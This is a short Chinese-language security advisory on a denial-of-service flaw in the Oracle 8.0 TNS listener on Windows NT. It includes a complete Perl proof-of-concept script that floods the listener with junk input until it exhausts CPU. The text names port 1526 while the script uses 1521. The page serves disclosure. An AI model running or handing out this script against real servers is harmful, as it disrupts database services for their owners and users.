发布日期：2001-04-26
更新日期：2001-04-26

受影响系统：

   Oracle Oracle8 8.0x

描述：

---

BUGTRAQ ID: 2626

Oracle 8存在一个拒绝服务缺陷。攻击者连接TCP/1526端口，发送无效输入，可能导
致"TNSLSNR80.EXE"进程消耗所有可用系统资源，最终服务停止响应。

<* 来源：(r0ot@runbox.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/local/bin/perl -w

# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com

use IO::Socket;

$host="kickme";
# enter the hostname of the oracle-server to kick

socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);

sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
        sleep(2);
        print HANDLE "dfsdffdfsfdggfdgdf";
        # an arbitrary, but carefully chosen constant...
}

close(HANDLE);


建议：

---

厂商补丁：

暂无


浏览次数：4439
严重程度：0（网友投票）